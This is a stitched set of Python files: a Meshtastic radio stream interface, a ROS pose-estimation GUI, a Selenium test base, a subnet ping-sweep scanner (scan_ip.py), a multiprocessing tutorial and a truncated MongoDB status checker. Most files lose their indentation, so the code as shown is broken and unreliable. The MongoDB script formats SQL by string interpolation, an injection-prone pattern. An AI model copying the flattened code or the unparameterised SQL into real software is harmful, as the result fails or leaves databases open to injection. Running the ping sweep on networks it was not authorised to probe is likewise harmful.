if not noProto:
self.waitForConfig()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake
self._writeBytes(bytes([START1, START1, START1, START1]))
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
if not self.noProto: # Wait for the db download if using the protocol
self._waitConnected()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
if not self.stream is None:
self.stream.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing stream")
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
# logging.debug("reading character")
b = self._readBytes(1)
# logging.debug("In reader loop")
# logging.debug(f"read returned {b}")
if len(b) > 0:
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN: # we've at least got a header
                        # big endian length follows the header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
                                self._rxBuf = empty  # length was out of bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.warn(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
except OSError as ex:
if not self._wantExit: # We might intentionally get an exception during shutdown
logging.error(
f"Unexpected OSError, terminating meshtastic reader... {ex}")
except Exception as ex:
logging.error(
f"Unexpected exception, terminating meshtastic reader... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0]}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# OS-X/Windows seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin). Since it is going to drive it anyways we want to make
# sure it is driven low, so that the TBEAM won't reset
# Linux does this properly, so don't apply this hack (because it makes the reset button not work)
if platform.system() != 'Linux':
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname: AnyStr, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def close(self):
"""Close a connection to the device"""
logging.debug("Closing TCP stream")
# Sometimes the socket read might be blocked in the reader thread. Therefore we force the shutdown by closing
# the socket here
self._wantExit = True
if not self.socket is None:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
StreamInterface.close(self)
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
def _onTextReceive(iface, asDict):
"""Special text auto parsing for received messages"""
# We don't throw if the utf8 is invalid in the text message. Instead we just don't populate
# the decoded.data.text and we log an error message. This at least allows some delivery to
# the app and the app can deal with the missing decoded representation.
#
# Usually btw this problem is caused by apps sending binary data but setting the payload type to
# text.
try:
asBytes = asDict["decoded"]["payload"]
asDict["decoded"]["text"] = asBytes.decode("utf-8")
except Exception as ex:
logging.error(f"Malformatted utf8 in text message: {ex}")
def _onPositionReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["position"]
iface._fixupPosition(p)
# update node DB as needed
iface._getOrCreateByNum(asDict["from"])["position"] = p
def _onNodeInfoReceive(iface, asDict):
"""Special auto parsing for received messages"""
p = asDict["decoded"]["user"]
# decode user protobufs and update nodedb, provide decoded version as "position" in the published msg
# update node DB as needed
n = iface._getOrCreateByNum(asDict["from"])
n["user"] = p
    # We now have a node ID, make sure it is up to date in that table
iface.nodes[p["id"]] = n
"""Well known message payloads can register decoders for automatic protobuf parsing"""
protocols = {
portnums_pb2.PortNum.TEXT_MESSAGE_APP: KnownProtocol("text", onReceive=_onTextReceive),
portnums_pb2.PortNum.POSITION_APP: KnownProtocol("position", mesh_pb2.Position, _onPositionReceive),
portnums_pb2.PortNum.NODEINFO_APP: KnownProtocol("user", mesh_pb2.User, _onNodeInfoReceive),
portnums_pb2.PortNum.ADMIN_APP: KnownProtocol("admin", admin_pb2.AdminMessage),
portnums_pb2.PortNum.ROUTING_APP: KnownProtocol("routing", mesh_pb2.Routing),
portnums_pb2.PortNum.ENVIRONMENTAL_MEASUREMENT_APP: KnownProtocol("environmental", environmental_measurement_pb2.EnvironmentalMeasurement),
portnums_pb2.PortNum.REMOTE_HARDWARE_APP: KnownProtocol(
"remotehw", remote_hardware_pb2.HardwareMessage)
}
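# Hedged usage sketch (helper is never called here; the hostname is a placeholder):
# TCPInterface connects on construction, so closing is the only remaining step.
def _example_tcp_interface():
    iface = TCPInterface("meshtastic.local")
    iface.close()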
|
PoseFromCorrespondences.py
|
#!/usr/bin/env python
#
# Copyright (C) 2009 Rosen Diankov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement # for python 2.5
PKG = 'posedetectiondb' # this package name
NAME = 'PoseFromCorrespondences'
import roslib; roslib.load_manifest(PKG)
import os, sys, time, threading, string, struct
from optparse import OptionParser
from numpy import *
import cv, gtk
import rospy, tf
from roslib import rostime
import std_msgs.msg
import posedetection_msgs.msg
import sensor_msgs.msg
import geometry_msgs.msg
from cv_bridge import CvBridge, CvBridgeError
from IterativeClosestPoint import *
import ParseMessages
from openravepy import *
from Tkinter import *
import tkFileDialog
import copy
def FindExtrinsicCameraParams(imagepoints, objectpoints, KK):
""" Use OpenCV to solve for the affine transformation that matches imagepoints to object points
imagepoints - 2xN array
objectpoints - 3xN array
KK - 3x3 array or 4 element array
"""
imagepoints = array(imagepoints,float)
objectpoints = array(objectpoints,float)
if len(KK.shape) == 1:
cvKK = cv.CreateMat(3,3,cv.CV_32FC1)
cvKK[0,0] = KK[0]; cvKK[0,1] = 0; cvKK[0,2] = KK[2];
cvKK[1,0] = 0; cvKK[1,1] = KK[1]; cvKK[1,2] = KK[3];
cvKK[2,0] = 0; cvKK[2,1] = 0; cvKK[2,2] = 1;
else:
cvKK = cv.fromarray(KK)
cvDist = cv.CreateMat(4,1,cv.CV_32FC1)
cvDist[0,0] = 0; cvDist[1,0] = 0; cvDist[2,0] = 0; cvDist[3,0] = 0;
rvec = cv.CreateMat(3,1,cv.CV_32FC1)
tvec = cv.CreateMat(3,1,cv.CV_32FC1)
object_points = cv.CreateMatHeader(3,objectpoints.shape[0],cv.CV_32FC1)
cv.SetData(object_points,struct.pack('f'*(objectpoints.shape[0]*3),*transpose(objectpoints).flat),4*objectpoints.shape[0])
image_points = cv.CreateMatHeader(2,imagepoints.shape[0],cv.CV_32FC1)
cv.SetData(image_points,struct.pack('f'*(imagepoints.shape[0]*2),*transpose(imagepoints).flat),4*imagepoints.shape[0])
cv.FindExtrinsicCameraParams2(object_points,image_points,cvKK,cvDist,rvec,tvec)
T = matrixFromAxisAngle((rvec[0,0],rvec[1,0],rvec[2,0]))
T[0:3,3] = [tvec[0,0],tvec[1,0],tvec[2,0]]
return T
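# Hedged usage sketch (helper is never called): illustrates the expected argument
# shapes for FindExtrinsicCameraParams with made-up intrinsics and a 10 cm square of
# correspondences. All values below are illustrative only.
def _example_find_extrinsics():
    KK = array([520.0, 520.0, 320.0, 240.0])  # [fx, fy, cx, cy]
    imagepoints = array([[100.0, 120.0], [400.0, 110.0], [390.0, 300.0], [110.0, 310.0]])
    objectpoints = array([[0.0, 0.0, 0.0], [0.1, 0.0, 0.0], [0.1, 0.1, 0.0], [0.0, 0.1, 0.0]])
    return FindExtrinsicCameraParams(imagepoints, objectpoints, KK)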
class PoseFromCorrespondences(metaclass.AutoReloader):
"""
Extracts poses from a set of point correspondences
"""
def __init__(self,kinbodyfilename,verboselevel=1,frame_id=None):
self.orenv = Environment()
self.orenv.Load(kinbodyfilename)
self.orbody = self.orenv.GetBodies()[0]
self.orbody.SetTransform(eye(4))
self.trimesh = self.orenv.Triangulate(self.orbody)
self.orenv.SetViewer('qtcoin')
self.eventhandle = self.orenv.GetViewer().RegisterCallback(Viewer.Events.ItemSelection,self.ormousecb)
self.orpoint = None
self.objectpoints = []
self.verboselevel=verboselevel
self.extractionlck = threading.Lock()
self.cvpoint = None
self.Tobjectrel = None
self.imagepoints = []
self.cvwindow = 'ImageDisplay'
cv.NamedWindow(self.cvwindow, cv.CV_WINDOW_AUTOSIZE)
cv.SetMouseCallback(self.cvwindow,self.cvmousecb)
# register keycb with opencv window
self.bridge = CvBridge()
self.doquit = False
self.gui = threading.Thread(target=self.rungui)
self.gui.start()
self.pattern = (eye(4),None)
self.imagemsg = None
self.KK = None
self.image_sub = rospy.Subscriber("image",sensor_msgs.msg.Image,self.imagecb)
self.camerainfo_sub = rospy.Subscriber("camera_info",sensor_msgs.msg.CameraInfo,self.camerainfocb)
self.frame_id = frame_id
if self.frame_id is None:
self.object_sub = rospy.Subscriber("ObjectDetection",posedetection_msgs.msg.ObjectDetection,self.objectcb)
else:
self.tflistener=tf.TransformListener()
self.pub_relpose = rospy.Publisher("RelativePose", geometry_msgs.msg.Pose)
rospy.init_node(NAME, anonymous=True)#,disable_signals=False)
def __del__(self):
try:
self.image_sub.unregister()
except:
pass
try:
self.camerainfo_sub.unregister()
except:
pass
try:
self.object_sub.unregister()
except:
pass
try:
self.pub_relpose.unregister()
except:
pass
self.orenv.Destroy()
def ormousecb(self,link,pos,org):
if link.GetParent().GetNetworkId() == self.orbody.GetNetworkId():
T = linalg.inv(link.GetParent().GetTransform())
bodypos = dot(T[0:3,0:3],pos)+T[0:3,3]
self.orpoint = bodypos
self.ghandle = self.orenv.plot3(points=reshape(bodypos,(1,3)),pointsize=15.0,colors=array((1,0,0)))
return False
def cvmousecb(self,event,x,y,flags,param):
if event == cv.CV_EVENT_LBUTTONUP:
self.cvpoint = (x,y)
if event == cv.CV_EVENT_RBUTTONUP:
self.AddCorrespondence()
if event == cv.CV_EVENT_MBUTTONUP:
self.Reset()
def rungui(self):
self.main = Tk()
self.main.title('Create Object Database - 3 channel image') # window title
self.main.resizable(width=False, height=False)
buttonframe = Frame(self.main)
buttonframe.pack()
b1 = Button(buttonframe, text="Add Correspondence (R-Button)", command=self.AddCorrespondence)
b1.grid(row=1,column=1)
b2 = Button(buttonframe, text="Reset (M-Button)", command=self.Reset)
b2.grid(row=1,column=2)
b2 = Button(buttonframe, text="Quit", command=self.Quit)
b2.grid(row=1,column=3)
# b4 = Button(buttonframe, text="Keyboard", command=self.keycb)
# b4.grid(row=1,column=4)
entryframe = Frame(self.main)
entryframe.pack()
ltrans = Label(entryframe, text='Transform:')
ltrans.grid(row=1,column=1,sticky=W+E)
self.T_entry = Entry(entryframe,bg='white',width=100)
self.T_entry.grid(row=1,column=2)
# self.T_entry.grid(row=1,column=4)
self.main.mainloop()
def camerainfocb(self,infomsg):
with self.extractionlck:
self.KK = reshape(infomsg.K,(3,3))
if any([f!=0 for f in infomsg.D]):
print('Program does not support distorted images')
def imagecb(self,imagemsg):
with self.extractionlck:
self.imagemsg = imagemsg
def objectcb(self,objectmsg):
with self.extractionlck:
if len(objectmsg.objects) > 0:
quat = objectmsg.objects[0].pose.orientation
trans = objectmsg.objects[0].pose.position
self.pattern = (matrixFromPose([quat.w,quat.x,quat.y,quat.z,trans.x,trans.y,trans.z]),objectmsg.header.frame_id)
else:
self.pattern = (None,None)
def AddCorrespondence(self):
with self.extractionlck:
print('add correspondence')
# if self.frame_id:
# base_frame_id = self.orbody.GetLinks()[0].GetName()
# (trans,rot) = self.lookupTransform(base_frame_id, self.frame_id, rospy.Time(0))
# pose = r_[rot[3],rot[0],rot[1],rot[2],trans]
# self.pattern = (matrixFromPose(pose),base_frame_id)
if self.cvpoint is not None and self.orpoint is not None and self.pattern[0] is not None:
Tpattern_inv = linalg.inv(self.pattern[0])
self.imagepoints.append(array(self.cvpoint))
self.objectpoints.append(array(self.orpoint))
print('total gathered points: %d'%len(self.imagepoints))
if len(self.imagepoints) >= 4:
print(array(self.imagepoints))
print(array(self.objectpoints))
print(self.pattern[0])
Tcameraobject = FindExtrinsicCameraParams(array(self.imagepoints,float),array(self.objectpoints,float),self.KK)
self.Tobjectrel = dot(Tpattern_inv,Tcameraobject)
print('camera transform: ', Tcameraobject)
values = reshape(self.Tobjectrel[0:3,0:4],(12,))
print("relative transform is: ",self.Tobjectrel)
self.T_entry.insert(0, ' '.join(str(f) for f in values))
else:
print('point data not initialized')
def Reset(self):
print('reset')
self.imagepoints = []
self.objectpoints = []
self.Tobjectrel = None
def Quit(self):
print('quitting from gui')
self.doquit = True
self.main.quit()
def drawpart(self,cv_image,T,KK):
N = self.trimesh.vertices.shape[0]
pts = dot(transformPoints(T,self.trimesh.vertices),transpose(KK))
imagepts = pts[0:N,0:2]/reshape(repeat(pts[0:N,2],2),[N,2])
cvimagepts = [tuple(p) for p in array(imagepts,int)]
for tri in self.trimesh.indices:
cv.Line(cv_image,cvimagepts[tri[0]],cvimagepts[tri[1]],(255,255,255))
cv.Line(cv_image,cvimagepts[tri[1]],cvimagepts[tri[2]],(255,255,255))
cv.Line(cv_image,cvimagepts[tri[2]],cvimagepts[tri[0]],(255,255,255))
def drawcoordsys(self,cv_image,T,KK):
points3d = array(((0,0,0),(0.05,0,0),(0,0.05,0),(0,0,0.05)))
projpts = dot(transformPoints(T,points3d),transpose(KK))
x = array(projpts[:,0]/projpts[:,2],int)
y = array(projpts[:,1]/projpts[:,2],int)
cv.Line(cv_image,(x[0],y[0]),(x[1],y[1]),(0,0,255),1)
cv.Line(cv_image,(x[0],y[0]),(x[2],y[2]),(0,255,0),1)
cv.Line(cv_image,(x[0],y[0]),(x[3],y[3]),(255,0,0),1)
def keycb(self, char):
a=1
if (char != -1):
with self.extractionlck:
minangle=pi/200
mintranslation=.001
if char==1113955: #NumLock Insert
R=rotationMatrixFromAxisAngle(array([1,0,0]),minangle)
T=array([0,0,0])
elif char==1114111: #Num Lock Delete
R=rotationMatrixFromAxisAngle(array([1,0,0]),-minangle)
T=array([0,0,0])
elif char==1113936: #NumLock Home
R=rotationMatrixFromAxisAngle(array([0,1,0]),minangle)
T=array([0,0,0])
elif char==1113943: #Num Lock End
R=rotationMatrixFromAxisAngle(array([0,1,0]),-minangle)
T=array([0,0,0])
elif char==1113941: #Num Lock Page Up
R=rotationMatrixFromAxisAngle(array([0,0,1]),minangle)
T=array([0,0,0])
elif char==1113942: #Num Lock Page Down
R=rotationMatrixFromAxisAngle(array([0,0,1]),-minangle)
T=array([0,0,0])
elif char==65379: #Insert
R=eye(3)
T=array([1,0,0])
elif char==65535: #Delete
R=eye(3)
T=array([-1,0,0])
elif char==65360: #Home
R=eye(3)
T=array([0,1,0])
elif char==65367: #End
R=eye(3)
T=array([0,-1,0])
elif char==65365: #Page Up
R=eye(3)
T=array([0,0,1])
elif char==65366: #Page Down
R=eye(3)
T=array([0,0,-1])
else:
a=0
if a==1:
self.Tobjectrel[:3,:3]=dot(R,self.Tobjectrel[:3,:3])
self.Tobjectrel[:3,3]=self.Tobjectrel[:3,3]+mintranslation*T
print("relative: ",self.Tobjectrel)
def spin(self):
while not rospy.is_shutdown() and not self.doquit:
with self.extractionlck:
imagemsg = copy.copy(self.imagemsg)
KK = array(self.KK)
Tobjectrel = array(self.Tobjectrel) if self.Tobjectrel is not None else None
Tpattern = array(self.pattern[0]) if self.pattern[0] is not None else None
if KK is None or imagemsg is None:
time.sleep(0.1)
continue
                try:
                    cv_image = self.bridge.imgmsg_to_cv(imagemsg, "bgr8")
                except CvBridgeError as e:
                    # skip this frame if the conversion failed, otherwise cv_image is undefined below
                    print(e)
                    continue
if Tpattern is not None:
if Tobjectrel is not None:
self.drawpart(cv_image,dot(Tpattern,Tobjectrel),KK)
self.drawcoordsys(cv_image,Tpattern,KK)
if self.cvpoint is not None:
cv.Circle(cv_image,self.cvpoint,2,(0,0,255),2)
if Tobjectrel is not None:
posemsg = geometry_msgs.msg.Pose()
posemsg.orientation.w, posemsg.orientation.x, posemsg.orientation.y, posemsg.orientation.z, posemsg.position.x, posemsg.position.y, posemsg.position.z = poseFromMatrix(Tobjectrel)
self.pub_relpose.publish(posemsg)
gtk.gdk.threads_enter()
cv.ShowImage(self.cvwindow, cv_image)
char=cv.WaitKey(20)
self.keycb(char)
gtk.gdk.threads_leave()
time.sleep(1.0)
print('quitting spin')
if __name__== '__main__':
    parser = OptionParser(description='Estimates the pose of an openrave object by specifying manual correspondences between the image and the openrave environment. If a separate ObjectDetection pattern is added, will publish the pose of the object with respect to the pattern.')
parser.add_option('--quiet',action='store_true', dest='quiet',default=False,
help="If set will not print extraction output and times.")
parser.add_option('--kinbody', action='store', type='string', dest='kinbody',
help='OpenRAVE Kinbody file to load')
# parser.add_option('--frame_id', action='store', type='string', dest='frame_id',default=None,
# help='tf frame id for possible frame that camera is connected to')
parser.add_option('--Tobjectrel', action='store', type='string', dest='Tobjectrel',default=None,
help='Initial estimate of Tobject (3x4 matrix serialized by row-order)')
(options, args) = parser.parse_args()
if not options.kinbody:
        print('Error: Need to specify an OpenRAVE kinbody file (--kinbody)')
sys.exit(1)
gtk.gdk.threads_init()
try:
processor = PoseFromCorrespondences(options.kinbody)
if options.Tobjectrel is not None:
processor.Tobjectrel = r_[reshape([float(s) for s in options.Tobjectrel.split()[0:12]],[3,4]),[[0,0,0,1]]]
processor.spin()
except KeyboardInterrupt as e:
pass
|
test_base.py
|
import os
import tornado.ioloop
import tornado.httpserver
import multiprocessing
import unittest
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from vaindraft.app import Application
def create_process(port, queue, boot_function, application, processor=multiprocessing):
p = processor.Process(target=boot_function, args=(queue, port, application))
p.start()
return p
def start_application_server(queue, port, application):
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(port)
actual_port = port
if port == 0: # special case, an available port is picked automatically
# only pick first! (for now)
assert len(http_server._sockets) > 0
for s in http_server._sockets:
actual_port = http_server._sockets[s].getsockname()[1]
break
info = {
"port":actual_port,
}
queue.put_nowait(info)
tornado.ioloop.IOLoop.instance().start()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self.application = Application()
self.queue = multiprocessing.Queue()
self.server_process = create_process(0, self.queue, start_application_server, self.application)
options = Options()
options.add_argument("--headless")
self.driver = webdriver.Firefox(firefox_options=options)
def tearDown(self):
self.driver.quit()
self.server_process.terminate()
def wait_for_element(self, element_id, timeout=10):
return WebDriverWait(self.driver, timeout).until( EC.presence_of_element_located((By.ID, element_id)))
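# Hedged sketch of a concrete test case (the route and element id are placeholders):
# the queue filled by start_application_server carries the port the forked server
# actually bound, which the browser can then hit.
class ExampleSmokeTest(BaseTestCase):
    def test_page_loads(self):
        info = self.queue.get(timeout=10)
        self.driver.get("http://localhost:%d/" % info["port"])
        self.wait_for_element("content")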
|
scan_ip.py
|
'''
Scan device IP addresses in the same network
Author:
Viki (a) Vignesh Natarajan
https://vikiworks.io
'''
import os
import socket
import multiprocessing
import subprocess
from multiprocessing import Process, Queue
import signal
import time
from time import sleep
import sys
import threading
debug = False
#debug = True
child_process_list = []
parent_process_id = None
class_c_address_len = 255
number_of_process = 30
search_timeout = 200 #seconds
pingable_ip_list = []
# On Python 3, subprocess.check_call supports a timeout, so ping_timeout can be used
ping_timeout = 2 #seconds
# On Python 2, the timeout argument is not available, so it is disabled by default
ping_timeout = None #seconds
queue_get_timeout = 1 #seconds
def ping_ip(parent_write_queue, child_write_queue):
cmd = "ping"
arg1 = "-c1"
timeout_seconds=1
with open(os.devnull, 'w') as null_device:
        ''' Fetch IPs from the queue one at a time and ping them - every child process runs this same loop, each pulling unique addresses '''
while True:
if parent_write_queue.empty():
return
try:
ip = parent_write_queue.get(timeout=queue_get_timeout) #timeout in seconds
except:
if debug == True :
print("QUEUE TIMEOUT ERROR");
return
try:
#ping -c1 <ip address>
timeout_seconds = 10
if debug == True :
print("[ "+str(os.getpid())+" ] [ PINGING : "+str(ip)+" ]")
if ping_timeout == None:
subprocess.check_call([cmd, arg1, ip],stdout=null_device, stderr=null_device)
else:
subprocess.check_call([cmd, arg1, ip],stdout=null_device, stderr=null_device, timeout=ping_timeout)
child_write_queue.put(ip)
#print("[ DISCOVERED NEIGHBOUR : "+str(ip)+"\t]")
except:
child_write_queue.put(None)
if debug == True :
print("[ IP ADDRESS ] [ "+str(ip)+" ] [ NOT REACHABLE ]");
pass
#sleep(1)
return
def get_host_ip():
dns = "8.8.8.8"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((dns, port))
host_ip = s.getsockname()[0]
s.close()
return host_ip
def parent_signal_handler(signum, frame):
global child_process_list, parent_process_id
pid = os.getpid()
if (pid != None) and (pid != parent_process_id):
if debug == True :
print("[ERROR: SOME PROCESS OTHER THAN PARENT GOT (CTRL + C) Signal]")
return
if debug == True :
print("[PARENT_PROCESS : "+str(pid)+" ] GOT ( CTRL + C ) EVENT")
for child_process in child_process_list:
try:
if child_process.is_alive():
if debug == True :
print("[ PARENT ] [ TERMINATING ][ CHILD_PROCESS_ID : "+str(child_process.pid)+" ]")
child_process.terminate()
except:
pass
sys.exit(-1);
def child_signal_handler(signum, frame):
''' TERMINATING OTHER CLIENTS AND ITSELF
'''
if debug == True :
print("[ CHILD GOT (CTRL + C) SIGNAL] [ TERMINATING OTHER CLIENTS ]")
my_pid = os.getpid()
current_process = None
for child_process in child_process_list:
if(child_process.pid == my_pid):
current_process = child_process
continue
try:
if child_process.is_alive():
if debug == True :
print("[ CHILD ] [ TERMINATING ][ CHILD_PROCESS_ID : "+str(child_process.pid)+" ]")
child_process.terminate()
except:
pass
try:
#Terminate current child process
if (current_process !=None) and (current_process.is_alive()):
if debug == True :
print("[ CHILD ] [ TERMINATING ITSELF][ CHILD_PROCESS_ID : "+str(current_process.pid)+" ]")
current_process.terminate()
except:
pass
def parent_signal_listener():
try:
signal.signal(signal.SIGINT, parent_signal_handler)
except:
if debug == True :
print("[ ERROR: UNABLE TO SET HANDLER FOR SIGNAL -> SIGINT ]")
def child_signal_listener():
try:
signal.signal(signal.SIGINT, child_signal_handler)
except:
if debug == True :
print("[ ERROR: UNABLE TO SET HANDLER FOR SIGNAL -> SIGINT ]")
def print_results(child_write_queue):
if debug == True:
print("[PRINTING RESULTS]")
result_cnt = 0
global pingable_ip_list
start_time = time.time()
while True:
current_time = time.time()
time_delta = current_time - start_time
if (int(time_delta) >= search_timeout):
if debug == True:
print("[ SEARCH TIME EXPIRED ]")
time.sleep(0.5)
break
if child_write_queue.empty():
time.sleep(0.25)
continue
try:
ip = child_write_queue.get() #Remove data from queue [ Not reading, removing ;-) ]
if ip != None:
pingable_ip_list.append(ip)
print(str(ip))
else:
if debug == True:
print("[ DISCOVERED NEIGHBOUR : "+"None"+"\t]")
result_cnt += 1
if result_cnt >= class_c_address_len :
#print("[ IP SEARCH COMPLETED ]")
break
except:
if debug == True:
print("[ QUEUE GET EXCEPTION ]")
break
time.sleep(.25)
if debug == True:
print("[ RAISING SIGINT ]")
os.kill(os.getpid(), signal.SIGINT)
def DiscoverNeighborIPs():
global child_process_list, parent_process_id
my_host_ip = get_host_ip()
#print("[ HOST IP : "+str(my_host_ip)+" ]\n")
split_ip = my_host_ip.split('.')
base_ip = split_ip[0] + '.' + split_ip[1] + '.' + split_ip[2] + '.'
''' Queue where parent adds all usable ip address in a subnet and
child removes ip address from queue
'''
parent_write_queue = Queue()
''' Queue where child adds pingable ip address and
parent removes ip address from queue
'''
child_write_queue = Queue()
#Add 255 ip addresses for child to ping in the parent_write_queue
for i in range(class_c_address_len):
ip_address = base_ip + str(i+1)
parent_write_queue.put(ip_address)
''' Ask child process to listen ctrl+c signal '''
child_signal_listener()
child_process=None
for cp in range(number_of_process):
child_process = Process(target=ping_ip, args=(parent_write_queue, child_write_queue))
child_process_list.append(child_process)
child_process.start()
child_process = None
thread = threading.Thread(target=print_results, args=(child_write_queue,))
thread.daemon = True
thread.start()
for child_process in child_process_list:
''' Block Parent Process from terminating until this child_process completes its job '''
child_process.join()
    '''[ MAKE PARENT PROCESS LISTEN TO ( CTRL + C ) SIGNAL ]'''
parent_signal_listener()
#pingable_ip_list = print_results(child_write_queue)
return
def main():
global parent_process_id
parent_process_id = os.getpid()
if debug == True :
print("[ Parent Process ID : "+str(os.getpid())+" ]")
DiscoverNeighborIPs()
ip_list = pingable_ip_list
#print("\n[ REPORT: DISCOVERED IP ADDRESS LIST ]")
#for ip in ip_list:
# print("\t => "+str(ip))
if __name__ == '__main__':
main()
|
multiprocessing.py
|
"""
→ Python Multiprocessing
- multiprocessing = runnig tasks in parallel on different cpu cores, bypasses GIL used for thread
better for cpu bound tasks (heavy cpu usage)
better for io bound tasks(waiting around)
"""
import time
from multiprocessing import Process, cpu_count
def counter(num):
count = 0
    while count < num:
count += 1
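# Hedged sketch (never called from main below): fan the same CPU-bound loop out to one
# process per core, which is where multiprocessing pays off over threads.
def counter_per_core(num):
    procs = [Process(target=counter, args=(num,)) for _ in range(cpu_count())]
    for p in procs:
        p.start()
    for p in procs:
        p.join()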
def main():
    print(cpu_count())
    start = time.perf_counter()
    a = Process(target=counter, args=(5000,))
    b = Process(target=counter, args=(500,))
    a.start()
    b.start()
    a.join()
    b.join()
    print("finished in:", time.perf_counter() - start, "seconds")
if __name__ == "__main__":
main()
|
check_mongodb.py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import pymongo
import bson
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("lepus")
path='./include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def check_mongodb(host,port,user,passwd,server_id,tags):
try:
func.mysql_exec("insert into mongodb_status_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from mongodb_status where server_id='%s';" %(server_id),'')
func.mysql_exec("delete from mongodb_status where server_id='%s';" %(server_id),'')
#connect = pymongo.Connection(host,int(port))
client = pymongo.MongoClient(host, int(port))
db = client['admin']
db.authenticate(user,passwd)
serverStatus=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
time.sleep(1)
serverStatus_2=client.admin.command(bson.son.SON([('serverStatus', 1), ('repl', 2)]))
connect = 1
ok = int(serverStatus['ok'])
version = serverStatus['version']
uptime = serverStatus['uptime']
connections_current = serverStatus['connections']['current']
connections_available = serverStatus['connections']['available']
globalLock_activeClients = serverStatus['globalLock']['activeClients']['total']
globalLock_currentQueue = serverStatus['globalLock']['currentQueue']['total']
mem_bits = serverStatus['mem']['bits']
mem_resident = serverStatus['mem']['resident']
mem_virtual = serverStatus['mem']['virtual']
mem_supported = serverStatus['mem']['supported']
mem_mapped = serverStatus['mem']['mapped']
mem_mappedWithJournal = serverStatus['mem']['mappedWithJournal']
